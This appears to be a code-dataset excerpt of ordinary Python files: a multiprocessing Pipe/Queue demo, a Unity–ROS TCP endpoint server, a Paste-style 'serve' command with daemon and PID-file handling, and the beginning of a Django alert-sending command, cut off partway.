source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
demo_message.py
|
# -*- coding: utf-8 -*-
# ======================================================
# @Time : 21-1-16 下午1:30
# @Author : huang ha
# @Email : 1286304229@qq.com
# @File : demo_message.py
# @Comment:
# ======================================================
from multiprocessing import Process,Pipe,Queue
import multiprocessing as mp
def demo_1():
def f(conn):
# 发送
conn.send([42, None, 'hello'])
conn.close()
# 默认是全双工,返回两个连接端点,一个发送一个接收,可以任意设置
parent_conn, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
p.start()
# 接收
print(parent_conn.recv()) # prints "[42, None, 'hello']"
# 等待子进程结束
p.join()
def demo_2():
def f(q):
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
print(q.get()) # prints "[42, None, 'hello']"
p.join()
if __name__ == '__main__':
# mp.set_start_method('spawn')
# demo_1()
demo_2()
|
server.py
|
# Copyright 2020 Unity Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import rospy
import socket
import logging
import threading
import importlib
from .tcp_sender import UnityTcpSender
from .client import ClientThread
from .subscriber import RosSubscriber
from .publisher import RosPublisher
from .service import RosService
from .unity_service import UnityService
class TcpServer:
"""
Initializes ROS node and TCP server.
"""
def __init__(self, node_name, buffer_size=1024, connections=2, tcp_ip="", tcp_port=-1):
"""
Initializes ROS node and class variables.
Args:
node_name: ROS node name for executing code
buffer_size: The read buffer size used when reading from a socket
connections: Max number of queued connections. See Python Socket documentation
"""
if tcp_ip != "":
self.tcp_ip = tcp_ip
else:
self.tcp_ip = rospy.get_param("/ROS_IP")
if tcp_port != -1:
self.tcp_port = tcp_port
else:
self.tcp_port = rospy.get_param("/ROS_TCP_PORT", 10000)
self.unity_tcp_sender = UnityTcpSender()
self.node_name = node_name
self.publishers = {}
self.subscribers = {}
self.ros_services = {}
self.unity_services = {}
self.buffer_size = buffer_size
self.connections = connections
self.syscommands = SysCommands(self)
self.pending_srv_id = None
self.pending_srv_is_request = False
def start(self, publishers=None, subscribers=None):
if publishers is not None:
self.publishers = publishers
if subscribers is not None:
self.subscribers = subscribers
server_thread = threading.Thread(target=self.listen_loop)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
def listen_loop(self):
"""
Creates and binds sockets using TCP variables then listens for incoming connections.
For each new connection a client thread will be created to handle communication.
"""
rospy.loginfo("Starting server on {}:{}".format(self.tcp_ip, self.tcp_port))
tcp_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tcp_server.bind((self.tcp_ip, self.tcp_port))
while True:
tcp_server.listen(self.connections)
try:
(conn, (ip, port)) = tcp_server.accept()
ClientThread(conn, self, ip, port).start()
except socket.timeout as err:
logging.exception("ros_tcp_endpoint.TcpServer: socket timeout")
def send_unity_error(self, error):
self.unity_tcp_sender.send_unity_error(error)
def send_unity_message(self, topic, message):
self.unity_tcp_sender.send_unity_message(topic, message)
def send_unity_service(self, topic, service_class, request):
return self.unity_tcp_sender.send_unity_service_request(topic, service_class, request)
def send_unity_service_response(self, srv_id, data):
self.unity_tcp_sender.send_unity_service_response(srv_id, data)
def handle_syscommand(self, topic, data):
function = getattr(self.syscommands, topic[2:])
if function is None:
self.send_unity_error("Don't understand SysCommand.'{}'".format(topic))
return
else:
message_json = data.decode("utf-8")
params = json.loads(message_json)
function(**params)
class SysCommands:
def __init__(self, tcp_server):
self.tcp_server = tcp_server
def subscribe(self, topic, message_name):
if topic == "":
self.tcp_server.send_unity_error(
"Can't subscribe to a blank topic name! SysCommand.subscribe({}, {})".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name)
if message_class is None:
self.tcp_server.send_unity_error(
"SysCommand.subscribe - Unknown message class '{}'".format(message_name)
)
return
rospy.loginfo("RegisterSubscriber({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.subscribers:
self.tcp_server.subscribers[topic].unregister()
self.tcp_server.subscribers[topic] = RosSubscriber(topic, message_class, self.tcp_server)
def publish(self, topic, message_name, queue_size=10, latch=False):
if topic == "":
self.tcp_server.send_unity_error(
"Can't publish to a blank topic name! SysCommand.publish({}, {})".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name)
if message_class is None:
self.tcp_server.send_unity_error(
"SysCommand.publish - Unknown message class '{}'".format(message_name)
)
return
rospy.loginfo("RegisterPublisher({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.publishers:
self.tcp_server.publishers[topic].unregister()
self.tcp_server.publishers[topic] = RosPublisher(topic, message_class, queue_size, latch)
def ros_service(self, topic, message_name):
if topic == "":
self.tcp_server.send_unity_error(
"RegisterRosService({}, {}) - Can't register a blank topic name!".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name, "srv")
if message_class is None:
self.tcp_server.send_unity_error(
"RegisterRosService({}, {}) - Unknown service class '{}'".format(
topic, message_name, message_name
)
)
return
rospy.loginfo("RegisterRosService({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.ros_services:
self.tcp_server.ros_services[topic].unregister()
self.tcp_server.ros_services[topic] = RosService(topic, message_class)
def unity_service(self, topic, message_name):
if topic == "":
self.tcp_server.send_unity_error(
"RegisterUnityService({}, {}) - Can't register a blank topic name!".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name, "srv")
if message_class is None:
self.tcp_server.send_unity_error(
"RegisterUnityService({}, {}) - Unknown service class '{}'".format(
topic, message_name, message_name
)
)
return
rospy.loginfo("RegisterUnityService({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.unity_services:
self.tcp_server.unity_services[topic].unregister()
self.tcp_server.unity_services[topic] = UnityService(topic, message_class, self.tcp_server)
def response(self, srv_id): # the next message is a service response
self.tcp_server.pending_srv_id = srv_id
self.tcp_server.pending_srv_is_request = False
def request(self, srv_id): # the next message is a service request
self.tcp_server.pending_srv_id = srv_id
self.tcp_server.pending_srv_is_request = True
def topic_list(self):
self.tcp_server.unity_tcp_sender.send_topic_list()
def resolve_message_name(name, extension="msg"):
try:
names = name.split("/")
module_name = names[0]
class_name = names[1]
importlib.import_module(module_name + "." + extension)
module = sys.modules[module_name]
if module is None:
rospy.logerr("Failed to resolve module {}".format(module_name))
module = getattr(module, extension)
if module is None:
rospy.logerr("Failed to resolve module {}.{}".format(module_name, extension))
module = getattr(module, class_name)
if module is None:
rospy.logerr(
"Failed to resolve module {}.{}.{}".format(module_name, extension, class_name)
)
return module
except (IndexError, KeyError, AttributeError, ImportError) as e:
rospy.logerr("Failed to resolve message name: {}".format(e))
return None
|
serve.py
|
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out uneeded functionality.
# All top level imports from each package moved here and organized
import atexit
import configparser
import errno
import grp
import logging
import optparse
import os
import pwd
import re
import resource
import signal
import socket
import subprocess
import sys
import textwrap
import threading
import time
from gettext import gettext as _
from logging.config import fileConfig
from typing import Optional
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault:
pass
# run and invoke methods moved below ServeCommand
class Command:
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args: Optional[int] = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file: Optional[int] = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description: Optional[str] = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%prog [options]{}\n{}".format(
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '{} {}'.format(os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def _standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(_standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = list()
commands.sort()
if not commands:
print('No commands registered.')
print('Have you installed Paste Script?')
print('(try running python setup.py develop)')
return 2
print('Known commands:')
longest = max([len(n) for n, c in commands])
for name, command in commands:
print(' {} {}'.format(self.pad(name, length=longest),
command.load().summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description: Optional[str] = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False)
and getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except OSError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except OSError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
raise OSError(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print(f'Writing PID {pid} to {pid_file}')
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except OSError as e:
print("Could not delete: %s" % e)
return 2
return 1
for _i in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print(f'PID {pid} in {pid_file} is not running')
return 1
print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except OSError:
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to {}:{} ({}:{})'.format(
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter:
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, OSError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file {} contains {}, not expected PID {}".format(
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
print(f'Stale PID left in file: {filename} ({e:e})')
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
for bound_address in bound_addresses:
for _i in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except OSError as e:
if e.errno != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_')
and sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e)
exit_code = e.exit_code
sys.exit(exit_code)
|
sendalerts.py
|
import time
from threading import Thread
from django.core.management.base import BaseCommand
from django.utils import timezone
from hc.api.models import Check, Flip
def notify(flip_id, stdout):
flip = Flip.objects.get(id=flip_id)
check = flip.owner
# Set the historic status here but *don't save it*.
# It would be nicer to pass the status explicitly, as a separate parameter.
check.status = flip.new_status
# And just to make sure it doesn't get saved by a future coding accident:
setattr(check, "save", None)
tmpl = "Sending alert, status=%s, code=%s\n"
stdout.write(tmpl % (flip.new_status, check.code))
# Set dates for followup nags
if flip.new_status == "down":
check.project.set_next_nag_date()
# Send notifications
errors = flip.send_alerts()
for ch, error in errors:
stdout.write("ERROR: %s %s %s\n" % (ch.kind, ch.value, error))
def notify_on_thread(flip_id, stdout):
t = Thread(target=notify, args=(flip_id, stdout))
t.start()
class Command(BaseCommand):
help = 'Sends UP/DOWN email alerts'
